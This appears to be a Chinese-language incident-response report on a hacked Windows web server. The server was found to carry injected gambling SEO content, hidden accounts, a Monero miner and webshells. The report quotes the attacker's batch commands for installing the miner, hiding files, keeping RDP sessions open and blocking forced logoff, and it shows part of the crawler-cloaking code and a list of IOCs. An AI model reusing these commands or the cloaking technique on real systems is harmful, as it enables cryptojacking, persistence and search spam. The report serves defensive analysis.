一次入侵應急響應分析
前言
本文是前段時間處理某用戶被黑的分析總結,用戶被黑的表現是使用爬蟲訪問用戶網站的首頁時會出現博彩關鍵字,而使用正常瀏覽器訪問時無相關的博彩關鍵詞。這是典型的黑帽SEO的表現,針對這種技術,
前期文章已有相關分析,感興趣的同學可以看一看。
此次分析,發現用戶的伺服器被多波不同利益的黑客入侵,裡面有一些比較有意思的內容,所以特意分析總結了一下。
一、概述
1、分析結果
經過分析,目前得到以下結論:
1)伺服器上存在博彩信息與挖礦程序,說明被多波不同利益團隊的黑客入侵;
2)此伺服器於2018年9月21日被黑客入侵後加上相應的博彩內容,相應的IP為175.41.27.93;
3)此伺服器在2016年2月份甚至更早就已經被黑客植入網馬了;
4)伺服器在2017年12月19日被植入挖礦程序;
5)系統被增加了隱藏賬號test$,並且在2018年9月21日14:38發現賬號guest有IP為212.66.52.88,地理位置為烏克蘭登錄的情況。
二、分析過程
2.1 入侵現象
2018年9月份,通過我司監測平台監測到某網站被植入博彩內容,具體如下:
網站被植入博彩信息
網站被植入博彩基本上說明網站被黑客入侵,我司「捕影」應急響應小組立即協助用戶進行入侵分析。
2.2 系統分析
系統分析主要用於分析其系統賬號、進程、開放埠、連接、啟動項、文件完整性、關鍵配置文件等,通過系統相關項的分析判斷其系統層面是否正常。對其系統層面分析,發現以下層面存在問題:
系統賬號
對系統賬號的分析,目前發現系統存在以下賬號:
Administraotr、MYSQL_ZKEYS、test$ 、zhimei、renjian、APP_IWAM_61264026、APP_IWAM_6127201、guest
其中test$明顯為隱藏賬號,一般情況下系統管理員不會增加隱藏賬號,該賬號肯定為黑客增加。另外幾個賬號,如zhimei、renjian等為可疑賬號,需要管理人員進行確認。
系統賬號情況
管理員信息
管理員組中存在administrator和guest,一般情況下guest為來賓賬號,不會增加到管理員組中,懷疑該賬號為黑客增加到管理員組中。
系統賬號存在兩個問題:
1)伺服器被增加test$隱藏賬號
2)Guest賬號被加入到管理員組中
日誌分析
通過相關安全產品的日誌,可以看到guest賬號於2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄,該賬號密碼肯定已泄露,建議禁用該賬號。
進程與服務分析
對其伺服器分析,發現其伺服器的CPU利用率非常高,利用率為100%。發現主要被SQLServer.exe佔用。
CPU利用率為100%
SQLServer.exe佔用CPU最高
找到該程序所在的目錄,發現該程序放在C:ProgramDataMySQL目錄下,並且被目錄被隱藏。裡面有四個文件,兩個bat文件,兩個exe文件。
【Startservice.bat功能分析】
對startservice.bat進行分析,其內容如下:
其功能如下:
1)set SERVICE_NAME=SystemHost,指定其服務名為SystemHost:
2)Tomcat9 install"%SERVICE_NAME%" SQLServer.exe -o stratum+tcp://pool.minexmr.com:7777–u 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt
7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F -p x -dbg -1-t 0
使用Tomcat9 安裝相應的挖礦程序,挖礦參數分析:
礦池地址 | pool.minexmr.com |
|---|---|
礦池埠 | 7777 |
礦工賬號 | 49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F |
挖礦程序被植入時間 | 2017 年 12 月 19 日 16:29 |
挖數字貨幣類型 | XMR 門羅幣 , 一種全匿名的數字貨幣。其特點在於交易過程全匿名,無法追蹤。 |
挖 XMR 數量與價值 | 7.6XMR 人民幣約 6000 元 |
礦池網站
黑客挖XMR數量
挖礦程序被植入時間
3)Set ProcessName=SQLServer.exe指定進程名為SQLServer.exe:
4)attrib +h +r %cd%*.*
作用:將該目錄下的所有文件隱藏
5) reg add "HKLMsystemCurrentControlSetControlTerminal Server
WinStationsRDP-Tcp" /v "MaxConnectionTime"/t REG_DWORD /d 0x1 /f
reg add"HKLMsystemCurrentControlSetControlTerminalServerWinStationsRDP-Tcp" /v "MaxDisconnectionTime" /tREG_DWORD /d 0x0 /f
reg add"HKLMsystemCurrentControlSetControlTerminalServerWinStationsRDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0/f
功能:配置註冊表,作用為使遠程連接永不超時。
6) net accounts /forcelogoff:no
功能: 防止強制註銷用戶
【mHi.bat功能分析】
mHi.bat的功能如下:
1)將c:ProgramData及C:ProgramDataMySQL隱藏,防止安全人員發現;
2)指定C:ProgramDataMySQL、C:WINDOWSTasksAdobeFlash Player Updater.job、C:WINDOWSTasksGoogleUpdateTaskMashine.job相關文件的訪問控制許可權,僅允許SYSTEM組用戶完全控制:
mHi.bat功能
calcls功能
【SQLServer.exe功能分析】
子進程,主要功能用來挖礦
【Tomcat9.exe功能分析】
1)SQLServer.exe的父進程,用來守護SQLServer.exe,
2)SQLServer.exe一旦被關閉,會立即啟動SQLServer.exe
【功能總結】
通過以上分析,可以看出,黑客增加的四個文件的主要作用如下:
【應急處置】
直接關閉SQLServer.exe,該程序立馬啟動。由於其存在父進程,直接查找父進程,命令如下:wmic process whereName="SQLServer.exe" get ParentProcessID:
首先關閉父進程Tomcat9.exe,然後再關閉子進程SQLServer.exe,挖礦程序被清除,CPU使用正常。
開放埠
對其該伺服器進行分析,發現該伺服器開放以下埠:
埠開放情況
埠開放情況
建議關閉 21 、 135 、 445 、 8080 等埠,其他埠需要根據業務需求來決定是否關閉。
其他分析
對該伺服器的連接、安裝軟體、關鍵配置文件、啟動項分析,目前未發現異常。
分析結論
通過對系統層面分析,其伺服器系統層面主要存在以下問題:
1)伺服器被增加test$隱藏賬號
2)Guest賬號被加入到管理員組中
3)guest賬號於2018年9月21日14:38被IP為212.66.52.88的烏克蘭IP登錄,該賬號密碼已泄露,目前已禁用該賬號
4)埠開放過多,其中21、135、445、8080等埠建議關閉
5)2017年12月19日已被植入挖礦程序
2.3 應用分析
博彩頁面分析
【技術原理】
通過內容分析,發現此次黑客為SEO性質的。其主要目的在於通過黑帽SEO獲取經濟利益,一般情況下,黑客植入博彩內容有以下途徑:
前端劫持
前端劫持一般都是在網站的相應頁面中插入JS腳本,通過JS來進行跳轉劫持。也有發現黑客直接修改相應的頁面內容的。
伺服器端劫持
伺服器端劫持也稱為後端劫持,其是通過修改網站動態語言文件,如global.asax、global.asa、conn.asp、conn.php這種文件。這些文件是動態腳本每次載入時都會載入的配置文件,如訪問x.php時會載入conn.php。這樣的話,只需要修改這些全局的動態腳本文件(如global.asax),訪問所有的aspx文件時都會載入這個global.asax文件,可以達到全局劫持的效果。
針對以上兩種劫持技術,可以直接查看我前期的技術分析:http://www.freebuf.com/articles/web/153788.html
【博彩分析】
通過頁面分析判斷為在伺服器端劫持,伺服器端劫持一般是修改全局配置文件,如global.asax、global.asa、conn.asp、conn.php。
通過對該伺服器分析,發現其修改config_global.php該文件。植入如下內容:
這裡面黑客將相應的劫持內容進行base64加密了,將其中base64加密的內容進行base64解密,得到以下內容:
其中 function isSpider()函數主要用來判斷是否為爬蟲訪問,爬蟲的瀏覽器特徵如下:
$bots= array( "baidu" => "baiduspider", "sogou" => "sogou", "360spider" => "haosouspider", "360spider" => "360spider", "bingbot" => "bingbot", "Yisou" => "Yisouspider",
如果是爬蟲則返回http://l5.wang2017.com/相關的內容。
【應急處置】
處置的話比較簡單,直接將黑客增加的base64加密的內容刪除即可,刪除相關內容以後,訪問正常。
Webshell分析
Webshell主要是網馬,其作用為通過webshell可以控制整個伺服器,並進行系統級別的操作,使用D盾對伺服器查殺,發現存在23個webshell。
webshell
選擇部分其代碼如下:
201806r4kfjtv4zexnvfbf.jpg圖片馬
針對網站發現的23個webshell,目前相關webshell均已刪除。
2.4 日誌分析
未找到有效日誌,無法分析入侵原因及途徑。
三、IOC
3.1 IP
212.66.52.88
175.41.27.93
3.2 URL
http://l5.wang2017.com
3.3 樣本MD5
70D9E2761B18CB0E4C4051E905F9E7A5
EA9F0B1E88B5E21B9A9D31D5C46E81D7
A3CD992FDDC2300AD8A23AD16FE3725C
A8ADE1F8D0D87E4D7A75919EE6B3740F
58A9B144762916FE227AF329F5D384F1
DBBB0ACE277D955833696F06C610DE2E
7F7D78755E070860EFFFD1272F14C7A7
9A5772ED22973DA02A45872BBC3735F2
E276D34B3AE124E8218CBC32B4D341B2
B663F32281526B17A540655EC05EC9EC
0D66C67B8BEC9627B696DEB275862E72
634630797CACCC334EFF054FE6279E91
AB908A995367FF0055DFF903F515B061
5D52847EC2CCC750951EF0765AEEC17B
249D7774648FB1CD309AA23B3F96430B
C13D2297D244D398B6A311DDA87DBDC7
C23206B81B06D64933C5FBC24AF69CF6
E14E6B1629ED5079F55B69DF66EDAFD7
8D01D604794D3494CBB31570B1E54182
2A235990DD38A0BCBAF2C4835EB8C0A3
5D568BC15EE4D861583E68B63762C2B1
0D66C67B8BEC9627B696DEB275862E72
3.4 礦池地址
stratum+tcp://pool.minexmr.com:7777
3.5 錢包地址
49ZRiTZK93yBqAJWBTh2zTAjvq8z9oTn38Rc2ScqSF7E8oRizddzy2iTh6kyyRibt7Ai1w8RWhTAPPPti4ZABeMpHhCJa1F
*本文作者:feiniao,轉載請註明來自FreeBuf.COM
※隱藏在證書文件中的PowerShell(一)
※淺談PHP安全規範
TAG:FreeBuf |